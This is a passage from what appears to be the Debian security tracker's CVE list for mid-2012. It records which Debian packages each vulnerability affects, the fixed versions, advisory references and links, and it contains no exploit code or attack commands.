CVE-2012-2359 (admin/roles/override.php in Moodle 2.0.x before 2.0.9, 2.1.x before ...) - moodle 2.2.3.dfsg-1 (bug #674163) [squeeze] - moodle (Only affects 2.0 to 2.2) CVE-2012-2358 (Moodle 2.0.x before 2.0.9, 2.1.x before 2.1.6, and 2.2.x before 2.2.3 ...) - moodle 2.2.3.dfsg-1 (bug #674163) [squeeze] - moodle (Only affects 2.0 to 2.2) CVE-2012-2357 (The Multi-Authentication feature in the Central Authentication Service ...) - moodle 2.2.3.dfsg-1 (bug #674163) [squeeze] - moodle (Only affects 2.1 to 2.2) CVE-2012-2356 (The question-bank functionality in Moodle 2.1.x before 2.1.6 and 2.2.x ...) - moodle 2.2.3.dfsg-1 (bug #674163) [squeeze] - moodle (Only affects 2.1 to 2.2) CVE-2012-2355 (Moodle 2.1.x before 2.1.6 and 2.2.x before 2.2.3 allows remote ...) - moodle 2.2.3.dfsg-1 (bug #674163) [squeeze] - moodle (Only affects 2.1 to 2.2) CVE-2012-2354 (Moodle 2.1.x before 2.1.6 and 2.2.x before 2.2.3 allows remote ...) - moodle 2.2.3.dfsg-1 (bug #674163) [squeeze] - moodle (Only affects 2.1 to 2.2) CVE-2012-2353 (Moodle 2.1.x before 2.1.6 and 2.2.x before 2.2.3 allows remote ...) - moodle 2.2.3.dfsg-1 (bug #674163) [squeeze] - moodle (Only affects 2.1 to 2.2) CVE-2012-2352 (The archive management (arc_manage) page in wwsympa/wwsympa.fcgi.in in ...) {DSA-2477-1} - sympa 6.1.11~dfsg-1 (bug #672893; high) NOTE: http://www.openwall.com/lists/oss-security/2012/05/12/8 CVE-2012-2351 (The default configuration of the auth/saml plugin in Mahara before ...) {DSA-2467-1} - mahara 1.4.2-1 CVE-2012-2350 [pam_shield default configuration does not take any action] RESERVED - pam-shield 0.9.2-3.3 (low; bug #658830) [squeeze] - pam-shield 0.9.2-3.3~squeeze1 CVE-2012-2349 REJECTED CVE-2012-2348 REJECTED CVE-2012-2347 REJECTED CVE-2012-2346 REJECTED CVE-2012-2345 REJECTED CVE-2012-2344 REJECTED CVE-2012-2343 REJECTED CVE-2012-2342 REJECTED CVE-2012-2341 (Cross-site request forgery (CSRF) vulnerability in the Take Control ...) NOTE: http://www.openwall.com/lists/oss-security/2012/05/10/6 NOTE: http://www.openwall.com/lists/oss-security/2012/05/11/2 NOT-FOR-US: Drupal Take Control CVE-2012-2340 (The Contact Forms module 7.x-1.x before 7.x-1.2 for Drupal does not ...) NOTE: http://www.openwall.com/lists/oss-security/2012/05/10/6 NOTE: http://www.openwall.com/lists/oss-security/2012/05/11/2 NOT-FOR-US: Drupal Contact Forms CVE-2012-2339 (Cross-site scripting (XSS) vulnerability in the Glossary module ...) NOTE: http://www.openwall.com/lists/oss-security/2012/05/10/6 NOTE: http://www.openwall.com/lists/oss-security/2012/05/11/2 NOT-FOR-US: Drupal Glossary CVE-2012-2338 (SQL injection vulnerability in includes/picture.class.php in Galette ...) NOT-FOR-US: Galette NOTE: http://redmine.ulysses.fr/issues/250 NOTE: http://redmine.ulysses.fr/projects/galette/repository/revisions/8c13ec159ba NOTE: http://www.openwall.com/lists/oss-security/2012/05/10/5 NOTE: http://www.openwall.com/lists/oss-security/2012/05/11/1 CVE-2012-2337 (sudo 1.6.x and 1.7.x before 1.7.9p1, and 1.8.x before 1.8.4p5, does ...) {DSA-2478-1} - sudo 1.8.3p2-1.1 (bug #673766) CVE-2012-2336 (sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when ...) - php5 5.4.3 (unimportant) NOTE: Rather harmless bug CVE-2012-2335 (php-wrapper.fcgi does not properly handle command-line arguments, ...) NOT-FOR-US: Incomplete wrapper provided by PHP as workaround for CVE-2012-1823/CVE-2012-2311 CVE-2012-2334 (Integer overflow in filter/source/msfilter/msdffimp.cxx in ...) {DSA-2487-1} - libreoffice 1:3.5.2~rc2-1 - openoffice.org 1:3.3.0-1 NOTE: Since 3.3.0 openoffice.org is a transitional source package CVE-2012-2333 (Integer underflow in OpenSSL before 0.9.8x, 1.0.0 before 1.0.0j, and ...) {DSA-2475-1} - openssl 1.0.1c-1 (bug #672452) NOTE: http://seclists.org/oss-sec/2012/q2/299 NOTE: http://www.openssl.org/news/secadv_20120510.txt CVE-2012-2332 (SQL injection vulnerability in serendipity/serendipity_admin.php in ...) - serendipity (bug #671937; medium) NOTE: http://www.koramis.com/advisories/2012/KORAMIS-ADV2012-001.txt NOTE: http://blog.s9y.org/archives/240-Serendipity-1.6.1-released.html NOTE: CVE id requested http://seclists.org/oss-sec/2012/q2/276 CVE-2012-2331 (Cross-site scripting (XSS) vulnerability in ...) - serendipity (bug #671937; medium) NOTE: http://www.koramis.com/advisories/2012/KORAMIS-ADV2012-001.txt NOTE: http://blog.s9y.org/archives/240-Serendipity-1.6.1-released.html NOTE: CVE id requested http://seclists.org/oss-sec/2012/q2/276 CVE-2012-2330 (The Update method in src/node_http_parser.cc in Node.js before 0.6.17 ...) - nodejs 0.6.17~dfsg1-1 NOTE: http://blog.nodejs.org/2012/05/07/http-server-security-vulnerability-please-upgrade-to-0-6-17/ NOTE: https://github.com/joyent/node/commit/c9a231d CVE-2012-2329 (Buffer overflow in the apache_request_headers function in ...) - php5 5.4.3-1 [squeeze] - php5 (Vulnerable code not present) NOTE: 5.4.x only CVE-2012-2328 RESERVED NOT-FOR-US: sblim CVE-2012-2327 (MyBB (aka MyBulletinBoard) before 1.6.7 allows remote attackers to ...) NOT-FOR-US: MyBB (aka MyBulletinBoard) NOTE: http://blog.mybb.com/2012/04/01/mybb-1-6-7-update-1-8-development/ NOTE: http://www.openwall.com/lists/oss-security/2012/05/07/14 CVE-2012-2326 (Cross-site scripting (XSS) vulnerability in the Admin Control Panel ...) NOT-FOR-US: MyBB (aka MyBulletinBoard) NOTE: http://blog.mybb.com/2012/04/01/mybb-1-6-7-update-1-8-development/ NOTE: http://www.openwall.com/lists/oss-security/2012/05/07/14 CVE-2012-2325 (SQL injection vulnerability in the User Inline Moderation feature in ...) NOT-FOR-US: MyBB (aka MyBulletinBoard) NOTE: http://blog.mybb.com/2012/04/01/mybb-1-6-7-update-1-8-development/ NOTE: http://www.openwall.com/lists/oss-security/2012/05/07/14 CVE-2012-2324 (Multiple SQL injection vulnerabilities in MyBB (aka MyBulletinBoard) ...) NOT-FOR-US: MyBB CVE-2012-2323 RESERVED CVE-2012-2322 (Integer overflow in the dhcpv6_get_option function in gdhcp/client.c ...) - connman 1.0-1 (bug #672989) [squeeze] - connman (Vulnerable code not present) CVE-2012-2321 (The loopback plug-in in ConnMan before 0.85 allows remote attackers to ...) - connman 1.0-1 (low; bug #672989) [squeeze] - connman (Minor issue) CVE-2012-2320 (ConnMan before 0.85 does not ensure that netlink messages originate ...) - connman 1.0-1 (low; bug #672989) [squeeze] - connman (Minor issue) CVE-2012-2319 (Multiple buffer overflows in the hfsplus filesystem implementation in ...) - linux 3.2.17-1 (low) - linux-2.6 [squeeze] - linux-2.6 2.6.32-46 CVE-2012-2318 (msg.c in the MSN protocol plugin in libpurple in Pidgin before 2.10.4 ...) - pidgin 2.10.4-1 CVE-2012-2317 (The Debian php_crypt_revamped.patch patch for PHP 5.3.x, as used in ...) - php5 5.3.6-1 (bug #581170) [squeeze] - php5 5.3.3-7+squeeze4 CVE-2012-2316 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: OpenKM CVE-2012-2315 (admin/Auth in OpenKM 5.1.7 and other versions before 5.1.8-2 does not ...) NOT-FOR-US: OpenKM CVE-2012-2314 (The bootloader configuration module (pyanaconda/bootloader.py) in ...) NOT-FOR-US: The anaconda installer CVE-2012-2313 (The rio_ioctl function in drivers/net/ethernet/dlink/dl2k.c in the ...) - linux 3.2.19-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-46 CVE-2012-2312 RESERVED - jbossas4 (Only affects JBoss 7) CVE-2012-2311 (sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when ...) {DSA-2465-1} - php5 5.4.3-1 (bug #671880) NOTE: This CVE ID is for the initial incomplete fix for CVE-2012-1823 NOTE: http://www.kb.cert.org/vuls/id/520827 NOTE: http://osvdb.org/show/osvdb/81633 CVE-2012-2310 (Cross-site scripting (XSS) vulnerability in the cctags module for ...) NOT-FOR-US: Drupal addon not packaged CVE-2012-2309 (Cross-site scripting (XSS) vulnerability in the Glossify Internal ...) NOT-FOR-US: Drupal addon not packaged CVE-2012-2308 (Cross-site scripting (XSS) vulnerability in the Taxonomy Grid : ...) NOT-FOR-US: Drupal addon not packaged CVE-2012-2307 (Cross-site request forgery (CSRF) vulnerability in the Addressbook ...) NOT-FOR-US: Drupal addon not packaged CVE-2012-2306 (SQL injection vulnerability in the Addressbook module for Drupal ...) NOT-FOR-US: Drupal addon not packaged CVE-2012-2305 (Cross-site request forgery (CSRF) vulnerability in the Node Gallery ...) NOT-FOR-US: Drupal addon not packaged CVE-2012-2304 (The Linkit module 7.x-2.x before 7.x-2.3 for Drupal, when using an ...) NOT-FOR-US: Drupal addon not packaged CVE-2012-2303 (The Spaces module 6.x-3.x before 6.x-3.4 for Drupal does not enforce ...) NOT-FOR-US: Drupal addon not packaged CVE-2012-2302 (Site Documentation (Sitedoc) module for Drupal 6.x-1.x before 6.x-1.4 ...) NOT-FOR-US: Drupal addon not packaged CVE-2012-2301 [Drupal SA-CONTRIB-2012-064 - Ubercart - Arbitrary PHP Execution] RESERVED NOT-FOR-US: Drupal addon not packaged CVE-2012-2300 (Multiple cross-site scripting (XSS) vulnerabilities in the Ubercart ...) NOT-FOR-US: Drupal addon not packaged CVE-2012-2299 (The Ubercart module 6.x-2.x before 6.x-2.8 and 7.x-3.x before 7.x-3.1 ...) NOT-FOR-US: Drupal addon not packaged CVE-2012-2298 (Multiple cross-site scripting (XSS) vulnerabilities in the RealName ...) NOT-FOR-US: Drupal addon not packaged CVE-2012-2297 (Multiple cross-site scripting (XSS) vulnerabilities in the Creative ...) NOT-FOR-US: Drupal addon not packaged CVE-2012-2296 (The Janrain Engage (formerly RPX) module for Drupal 6.x-1.x. 6.x-2.x ...) NOT-FOR-US: Drupal addon not packaged CVE-2012-2295 RESERVED CVE-2012-2294 (EMC RSA Archer SmartSuite Framework 4.x and RSA Archer GRC 5.x before ...) NOT-FOR-US: EMC RSA Archer CVE-2012-2293 (Directory traversal vulnerability in EMC RSA Archer SmartSuite ...) NOT-FOR-US: EMC RSA Archer CVE-2012-2292 (The Silverlight cross-domain policy in EMC RSA Archer SmartSuite ...) NOT-FOR-US: EMC RSA Archer CVE-2012-2291 (EMC Avamar Client 4.x, 5.x, and 6.x on HP-UX and Mac OS X, and the EMC ...) NOT-FOR-US: EMC Avamar CVE-2012-2290 (The client in EMC NetWorker Module for Microsoft Applications (NMM) ...) NOT-FOR-US: EMC NetWorker Module for Microsoft Applications CVE-2012-2289 (EMC ApplicationXtender Desktop before 6.5 SP2 and ApplicationXtender ...) NOT-FOR-US: EMC CVE-2012-2288 (Format string vulnerability in the nsrd RPC service in EMC NetWorker ...) NOT-FOR-US: EMC NetWorker CVE-2012-2287 (The authentication functionality in EMC RSA Authentication Agent 7.1 ...) NOT-FOR-US: EMC RSA Authentication agent CVE-2012-2286 (Unspecified vulnerability in EMC RSA Adaptive Authentication ...) NOT-FOR-US: EMC RSA Authentication agent CVE-2012-2285 (EMC Cloud Tiering Appliance (aka CTA, formerly FMA) 9.0 and earlier, ...) NOT-FOR-US: EMC Cloud Tiering Appliance CVE-2012-2284 (The (1) install and (2) upgrade processes in EMC NetWorker Module for ...) NOT-FOR-US: EMC NetWorker Module for Microsoft Applications CVE-2012-2283 (The Iomega Home Media Network Hard Drive with EMC Lifeline firmware ...) NOT-FOR-US: Iomega Home Media Network Hard Drive CVE-2012-2282 (EMC Celerra Network Server 6.x before 6.0.61.0, VNX 7.x before ...) NOT-FOR-US: EMC Celerra/VNX/VNXe CVE-2012-2281 (EMC RSA Access Manager Server 6.x before 6.1 SP4 and RSA Access ...) NOT-FOR-US: RSA Access Manager NOTE: http://seclists.org/bugtraq/2012/Jul/36 CVE-2012-2280 (EMC RSA Authentication Manager 7.1 before SP4 P14 and RSA SecurID ...) NOT-FOR-US: RSA Authentication Agent CVE-2012-2279 (Open redirect vulnerability in the Security Console in EMC RSA ...) NOT-FOR-US: RSA Authentication Agent CVE-2012-2278 (Multiple cross-site scripting (XSS) vulnerabilities in the (1) ...) NOT-FOR-US: RSA Authentication Agent CVE-2012-2277 (The IRM Server in EMC Documentum Information Rights Management 4.x ...) NOT-FOR-US: EMC Documentum Information Rights Management CVE-2012-2276 (The IRM Server in EMC Documentum Information Rights Management 4.x ...) NOT-FOR-US: EMC Documentum Information Rights Management CVE-2012-2275 (Multiple cross-site request forgery (CSRF) vulnerabilities in TestLink ...) NOT-FOR-US: TestLink CVE-2012-2274 (Cross-site scripting (XSS) vulnerability in pivotx/ajaxhelper.php in ...) NOT-FOR-US: PivotX CVE-2012-2273 (Comodo Internet Security before 5.10.228257.2253 on Windows 7 x64 ...) NOT-FOR-US: Comodo Internet Security CVE-2012-2272 RESERVED CVE-2012-2271 (Buffer overflow in the InitLicenKeys function in a certain ActiveX ...) NOT-FOR-US: SkinCrafter CVE-2012-2270 (Open redirect vulnerability in index.php (aka the Login Page) in ...) - owncloud 3.0.3-1 CVE-2012-2269 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before ...) - owncloud 3.0.2-1 CVE-2011-5089 (Buffer overflow in the Security Login ActiveX controls in ICONICS ...) NOT-FOR-US: ICONICS, BizViz CVE-2011-5088 (The GENESIS32 IcoSetServer ActiveX control in ICONICS GENESIS32 9.21 ...) NOT-FOR-US: ICONICS GENESIS32, BizViz CVE-2011-5087 (Unspecified vulnerability in AdAstrA TRACE MODE Data Center allows ...) NOT-FOR-US: AdAstrA TRACE MODE Data Center CVE-2011-5086 (https50.ocx in IP*Works! SSL in the server in Unitronics UniOPC before ...) NOT-FOR-US: Unitronics UniOPC CVE-2012-2268 (master.exe in the SNMP Master Agent in RealNetworks Helix Server and ...) NOT-FOR-US: RealNetworks Helix CVE-2012-2267 (master.exe in the SNMP Master Agent in RealNetworks Helix Server and ...) NOT-FOR-US: RealNetworks Helix CVE-2012-2266 RESERVED CVE-2012-2265 RESERVED CVE-2012-2264 RESERVED CVE-2012-2263 RESERVED CVE-2012-2262 RESERVED CVE-2012-2261 RESERVED CVE-2012-2260 RESERVED CVE-2012-2259 RESERVED CVE-2012-2258 RESERVED CVE-2012-2257 RESERVED CVE-2012-2256 RESERVED CVE-2012-2255 RESERVED CVE-2012-2254 RESERVED CVE-2012-2253 (Cross-site scripting (XSS) vulnerability in group/members.php in ...) {DSA-2591-1} - mahara 1.5.1-3.1 (bug #695789) CVE-2012-2252 (Incomplete blacklist vulnerability in rssh before 2.3.4, when the ...) {DSA-2578-1} - rssh 2.3.3-6 CVE-2012-2251 (rssh 2.3.2, as used by Debian, Fedora, and others, when the rsync ...) {DSA-2578-1} - rssh 2.3.3-6 CVE-2012-2250 RESERVED - tor 0.2.3.24-rc-1 (low) [squeeze] - tor (Minor issue) CVE-2012-2249 RESERVED - tor 0.2.3.23-rc-1 (low) [squeeze] - tor (Minor issue) CVE-2012-2248 [build-influenced PATH set in dhclient] RESERVED - isc-dhcp 4.2.4-3 (bug #690532) [wheezy] - isc-dhcp 4.2.2.dfsg.1-5+deb70u2 [squeeze] - isc-dhcp (CLIENT_PATH is not correctly defined) NOTE: Debian-specific CVE-2012-2247 (Cross-site scripting (XSS) vulnerability in Mahara 1.4.x before 1.4.5 ...) {DSA-2591-1} - mahara 1.5.1-3 NOTE: https://mahara.org/interaction/forum/topic.php?id=4938 NOTE: https://bugs.launchpad.net/mahara/+bug/1061980 CVE-2012-2246 (Mahara 1.4.x before 1.4.5 and 1.5.x before 1.5.4 allows remote ...) {DSA-2591-1} - mahara 1.5.1-3 NOTE: https://mahara.org/interaction/forum/topic.php?id=493 NOTE: https://bugs.launchpad.net/mahara/+bug/1057240 CVE-2012-2245 RESERVED CVE-2012-2244 (Mahara 1.4.x before 1.4.5 and 1.5.x before 1.5.4 allows remote ...) {DSA-2591-1} - mahara 1.5.1-3 NOTE: https://mahara.org/interaction/forum/topic.php?id=4936 NOTE: https://bugs.launchpad.net/mahara/+bug/1057238 CVE-2012-2243 (Cross-site scripting (XSS) vulnerability in Mahara 1.4.x before 1.4.5 ...) {DSA-2591-1} - mahara 1.5.1-3 NOTE: https://mahara.org/interaction/forum/topic.php?id=4937 NOTE: https://bugs.launchpad.net/mahara/+bug/1055232 NOTE: https://bugs.launchpad.net/mahara/+bug/1063480 CVE-2012-2242 (scripts/dget.pl in devscripts before 2.10.73 allows remote attackers ...) {DSA-2549-1} - devscripts 2.12.3 CVE-2012-2241 (scripts/dget.pl in devscripts before 2.12.3 allows remote attackers to ...) {DSA-2549-1} - devscripts 2.12.3 CVE-2012-2240 (scripts/dscverify.pl in devscripts before 2.12.3 allows remote ...) {DSA-2549-1} - devscripts 2.12.3 CVE-2012-2239 (Mahara 1.4.x before 1.4.4 and 1.5.x before 1.5.3 allows remote ...) {DSA-2591-1} - mahara 1.5.1-3 CVE-2012-2238 RESERVED - tryton-server (only affected 2.4, in experimental) CVE-2012-2237 RESERVED {DSA-2540-1} - mahara 1.5.1-2 CVE-2012-2236 (SQL injection vulnerability in users.php in PHP Gift Registry 1.5.5 ...) NOT-FOR-US: PHP Gift Registry CVE-2012-2235 (Cross-site scripting (XSS) vulnerability in Support Incident Tracker ...) NOT-FOR-US: Support Incident Tracker CVE-2012-2234 (Cross-site scripting (XSS) vulnerability in sources/users.queries.php ...) NOT-FOR-US: TeamPass.net CVE-2012-2233 RESERVED CVE-2012-2232 RESERVED CVE-2012-2231 RESERVED CVE-2012-2230 (Cloudera Manager 3.7.x before 3.7.5 and Service and Configuration ...) NOT-FOR-US: Cloudera Manager CVE-2012-2229 RESERVED CVE-2012-2228 RESERVED CVE-2012-2227 (Directory traversal vulnerability in update/index.php in PluXml before ...) NOT-FOR-US: PluXml CVE-2012-2226 RESERVED CVE-2012-2225 (360zip 1.93beta allows remote attackers to execute arbitrary code via ...) NOT-FOR-US: 360zip CVE-2012-2224 (Xunlei Thunder before 7.2.6 allows remote attackers to execute ...) NOT-FOR-US: Xunlei Thunder CVE-2012-2223 (The xplat agent in Novell ZENworks Configuration Management (ZCM) ...) NOT-FOR-US: Novell ZENworks Configuration Management CVE-2012-2222 RESERVED CVE-2012-2221 RESERVED CVE-2012-2220 RESERVED CVE-2012-2219 RESERVED CVE-2012-2218 RESERVED CVE-2012-2217 (The HTC IQRD service for Android on the HTC EVO 4G before 4.67.651.3, ...) NOT-FOR-US: Android CVE-2012-2216 RESERVED CVE-2012-2095 [wicd command execution with root privileges] RESERVED - wicd 1.7.2.4-1 (low; bug #668397) [squeeze] - wicd 1.7.0+ds1-5+squeeze2 CVE-2012-2215 (Directory traversal vulnerability in the Preboot Service in Novell ...) NOT-FOR-US: Novell ZENworks Configuration Management CVE-2012-2214 (proxy.c in libpurple in Pidgin before 2.10.4 does not properly handle ...) - pidgin 2.10.4-1 NOTE: http://www.pidgin.im/news/security/?id=62 CVE-2012-2213 (** DISPUTED ** Squid 3.1.9 allows remote attackers to bypass the ...) NOT-FOR-US: Disputed Squid access bypass, probably user error and minor impact anyway CVE-2012-2212 (** DISPUTED ** McAfee Web Gateway 7.0 allows remote attackers to ...) NOT-FOR-US: McAfee Web Gateway CVE-2012-2211 (Cross-site scripting (XSS) vulnerability in ...) - egroupware CVE-2012-2210 (The Sony Bravia TV KDL-32CX525 allows remote attackers to cause a ...) NOT-FOR-US: Sony Bravia CVE-2012-2209 (Multiple cross-site scripting (XSS) vulnerabilities in admin.php in ...) - piwigo (bug #685364) CVE-2012-2208 (Directory traversal vulnerability in upgrade.php in Piwigo before ...) - piwigo (bug #685364) CVE-2012-2207 RESERVED CVE-2012-2206 (The Web Gateway component in IBM WebSphere MQ File Transfer Edition ...) NOT-FOR-US: IBM WebSphere MQ File Transfer Edition CVE-2012-2205 (Cross-site scripting (XSS) vulnerability in IBM Rational ClearQuest ...) NOT-FOR-US: IBM Rational ClearQuest CVE-2012-2204 RESERVED CVE-2012-2203 (IBM Global Security Kit (aka GSKit) before 8.0.14.22, as used in IBM ...) NOT-FOR-US: IBM Global Security Kit CVE-2012-2202 (Directory traversal vulnerability in javatester_init.php in IBM Lotus ...) NOT-FOR-US: IBM Lotus Protector, IBM ISS Proventia Network Mail Security System CVE-2012-2201 RESERVED CVE-2012-2200 (The default configuration of sendmail in IBM AIX 6.1 and 7.1, and VIOS ...) NOT-FOR-US: sendmail configuration in AIX CVE-2012-2199 (The server message channel agent in the queue manager in the server in ...) NOT-FOR-US: IBM WebSphere MQ CVE-2012-2198 RESERVED CVE-2012-2197 (Stack-based buffer overflow in the Java Stored Procedure ...) NOT-FOR-US: IBM DB2 CVE-2012-2196 (IBM DB2 9.1 before FP12, 9.5 through FP9, 9.7 through FP6, 9.8 through ...) NOT-FOR-US: IBM DB2 CVE-2012-2195 RESERVED CVE-2012-2194 (Directory traversal vulnerability in the SQLJ.DB2_INSTALL_JAR stored ...) NOT-FOR-US: IBM DB2 CVE-2012-2193 (Cross-site scripting (XSS) vulnerability in Query Studio in IBM Cognos ...) NOT-FOR-US: IBM Cognos Business Intelligence CVE-2012-2192 (The socketpair function in IBM AIX 5.3, 6.1, and 7.1 and VIOS ...) NOT-FOR-US: AIX CVE-2012-2191 (IBM Global Security Kit (aka GSKit) before 8.0.14.22, as used in IBM ...) NOT-FOR-US: IBM Global Security Kit CVE-2012-2190 (IBM Global Security Kit (aka GSKit), as used in IBM HTTP Server in IBM ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2012-2189 RESERVED CVE-2012-2188 (IBM Power Hardware Management Console (HMC) 7R3.5.0 before SP4, ...) NOT-FOR-US: IBM Power Hardware Management Console CVE-2012-2187 (IBM Remote Supervisor Adapter II firmware for System x3650, x3850 M2, ...) NOT-FOR-US: IBM Remote Supervisor Adapter CVE-2012-2186 (Incomplete blacklist vulnerability in main/manager.c in Asterisk Open ...) {DSA-2550-1} - asterisk 1:1.8.13.1~dfsg-1 (bug #680470) CVE-2012-2185 (IBM Maximo Asset Management 6.2 through 7.5, as used in SmartCloud ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2012-2184 (Session fixation vulnerability in IBM Maximo Asset Management 7.1 ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2012-2183 (Session fixation vulnerability in IBM Maximo Asset Management 6.2 ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2012-2182 RESERVED CVE-2012-2181 (Directory traversal vulnerability in the Dojo module in IBM WebSphere ...) NOT-FOR-US: IBM WebSphere not in Debian CVE-2012-2180 (The chaining functionality in the Distributed Relational Database ...) NOT-FOR-US: IBM DB2 CVE-2012-2179 (libodm.a in IBM AIX 5.3, 6.1, and 7.1 allows local users to overwrite ...) NOT-FOR-US: AIX CVE-2012-2178 RESERVED CVE-2012-2177 (Cross-site scripting (XSS) vulnerability in IBM Cognos Business ...) NOT-FOR-US: IBM Cognos Business Intelligence CVE-2012-2176 (Multiple stack-based buffer overflows in a certain ActiveX control in ...) NOT-FOR-US: IBM Lotus Quickr CVE-2012-2175 (Buffer overflow in the Attachment_Times method in a certain ActiveX ...) NOT-FOR-US: IBM Lotus iNotes CVE-2012-2174 (The URL handler in IBM Lotus Notes 8.x before 8.5.3 FP2 allows remote ...) NOT-FOR-US: Notes CVE-2012-2173 (The ODBC driver in IBM Security AppScan Source 7.x and 8.x before 8.6 ...) NOT-FOR-US: AppScan CVE-2012-2172 (Cross-site scripting (XSS) vulnerability in SoftwareRegistration.do in ...) NOT-FOR-US: IBM System Storage DS Storage Manager CVE-2012-2171 (SQL injection vulnerability in ModuleServlet.do in the Storage Manager ...) NOT-FOR-US: IBM System Storage DS Storage Manager CVE-2012-2170 (The Application Snoop Servlet in IBM WebSphere Application Server 7.0 ...) NOT-FOR-US: WebSphere CVE-2012-2169 (Cross-site scripting (XSS) vulnerability in the file-upload ...) NOT-FOR-US: IBM Rational ClearQuest CVE-2012-2168 (IBM Rational ClearQuest 7.1.x before 7.1.2.7 and 8.x before 8.0.0.3 ...) NOT-FOR-US: IBM Rational ClearQuest CVE-2012-2167 (The IBM XIV Storage System Gen3 before 11.1.0.a allows remote ...) NOT-FOR-US: IBM XIV Storage System Gen3 CVE-2012-2166 RESERVED CVE-2012-2165 (IBM Rational ClearQuest 7.1.x before 7.1.2.7 and 8.x before 8.0.0.3, ...) NOT-FOR-US: IBM Rational ClearQuest CVE-2012-2164 (The Web client in IBM Rational ClearQuest 7.1.x before 7.1.2.7 and 8.x ...) NOT-FOR-US: IBM Rational ClearQuest CVE-2012-2163 (IBM Scale Out Network Attached Storage (SONAS) 1.1 through 1.3.1 ...) NOT-FOR-US: IBM Scale Out Network Attached Storage CVE-2012-2162 (The Web Server Plug-in in IBM WebSphere Application Server (WAS) 8.0 ...) NOT-FOR-US: WebSphere CVE-2012-2161 (Cross-site scripting (XSS) vulnerability in deferredView.jsp in IBM ...) NOT-FOR-US: IBM Security AppScan Source CVE-2012-2160 RESERVED CVE-2012-2159 (Open redirect vulnerability in IBM Eclipse Help System (IEHS), as used ...) NOT-FOR-US: IBM Eclipse Help System CVE-2012-2158 RESERVED CVE-2012-2157 RESERVED CVE-2012-2156 (Multiple cross-site scripting (XSS) vulnerabilities in Plume CMS 1.2.4 ...) NOT-FOR-US: Plume CMS CVE-2012-2155 (Cross-site request forgery (CSRF) vulnerability in the CDN2 Video ...) NOT-FOR-US: Drupal addon not packaged CVE-2012-2154 (Cross-site scripting (XSS) vulnerability in the CDN2 Video module 6.x ...) NOT-FOR-US: Drupal addon not packaged CVE-2012-2153 (Drupal 7.x before 7.14 does not properly restrict access to nodes in a ...) - drupal7 7.14-1 CVE-2012-2152 (Stack-based buffer overflow in the get_packet method in socket.c in ...) {DSA-2498-1} - dhcpcd 1:3.2.3-11 (bug #671265) NOTE: http://www.openwall.com/lists/oss-security/2012/05/02/4 CVE-2012-2151 (Multiple cross-site scripting (XSS) vulnerabilities in SPIP 1.9.x ...) {DSA-2461-1} - spip 2.1.13-1 (low; bug #671264) CVE-2012-2150 RESERVED CVE-2012-2149 (The WPXContentListener::_closeTableRow function in ...) - libwpd 0.9.4-1 NOTE: http://permalink.gmane.org/gmane.comp.security.full-disclosure/85789 NOTE: http://libwpd.git.sourceforge.net/git/gitweb.cgi?p=libwpd/libwpd;a=blobdiff;f=src/lib/WPXOLEStream.cpp;h=5bb11bd14912bda74c86392b20eb3d07207b7edb;hp=12b9340584855dca85cd429c1d3cf8a8e252e293;hb=7ce74979eef53d575ca433b525b6dff29cac5fd1;hpb=12560d3cb0f5d998b6d73bb6c881ec815a775932 CVE-2012-2148 RESERVED - jbossas4 (Only builds a few libraries, not the full application server) CVE-2012-2147 (munin-cgi-graph in Munin 2.0 rc4 allows remote attackers to cause a ...) - munin 2.0~rc6-1 (bug #670811) [squeeze] - munin (Vulnerable code not present) CVE-2012-2146 (Elixir 0.8.0 uses Blowfish in CFB mode without constructing a unique ...) - elixir (low; bug #670919) [squeeze] - elixir (Minor issue) [wheezy] - elixir (Minor issue) CVE-2012-2145 (Apache Qpid 0.17 and earlier does not properly restrict incoming ...) - qpid-cpp 0.16-1 (bug #672124) CVE-2012-2144 (Session fixation vulnerability in OpenStack Dashboard (Horizon) ...) - horizon 2012.1-4 (bug #671604) CVE-2012-2143 (The crypt_des (aka DES-based crypt) function in FreeBSD before ...) {DSA-2491-1} - postgresql-9.1 9.1.4-1 - postgresql-8.4 8.4.12-1 - php5 5.3.3-1 NOTE: Uses the unaffected system libraries since 5.3.3 CVE-2012-2142 RESERVED CVE-2012-2141 (Array index error in the handle_nsExtendOutput2Table function in ...) - net-snmp 5.4.3~dfsg-2.5 (low; bug #672492) [squeeze] - net-snmp (Minor issue) NOTE: Red Hat patch: https://bugzilla.redhat.com/attachment.cgi?id=580443&action=diff CVE-2012-2140 (The Mail gem before 2.4.3 for Ruby allows remote attackers to execute ...) - ruby-mail 2.4.4-1 CVE-2012-2139 (Directory traversal vulnerability in ...) - ruby-mail 2.4.4-1 CVE-2012-2138 (The @CopyFrom operation in the POST servlet in the ...) NOT-FOR-US: Apache Sling NOTE: http://lists.grok.org.uk/pipermail/full-disclosure/2012-July/087554.html CVE-2012-2137 (Buffer overflow in virt/kvm/irq_comm.c in the KVM subsystem in the ...) - linux 3.2.20-1 CVE-2012-2136 (The sock_alloc_send_pskb function in net/core/sock.c in the Linux ...) - linux 3.2.20-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-46 CVE-2012-2135 (The utf-16 decoder in Python 3.1 through 3.3 does not update the ...) - python3.1 (bug #670389) - python3.2 3.2.3-1 (bug #670389) - python3.3 3.3.1-1 NOTE: http://bugs.python.org/issue14579 CVE-2012-2134 RESERVED NOT-FOR-US: Dynamic LDAP backend plugin for BIND CVE-2012-2133 (Use-after-free vulnerability in the Linux kernel before 3.3.6, when ...) {DSA-2469-1} - linux-2.6 3.2.19-1 CVE-2012-2132 (libsoup 2.32.2 and earlier does not validate certificates or clear the ...) - midori (unimportant; bug #672880) NOTE: https://bugzilla.novell.com/show_bug.cgi?id=758431 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=817692 CVE-2012-2131 (Multiple integer signedness errors in crypto/buffer/buffer.c in ...) {DSA-2454-2} - openssl (only affected patch against 0.9.8) NOTE: http://marc.info/?l=openssl-dev&m=133525318514423&w=2 CVE-2012-2130 RESERVED - polarssl 1.1.2-1 [squeeze] - polarssl (Introduced in 0.99-pre4) CVE-2012-2129 (Cross-site scripting 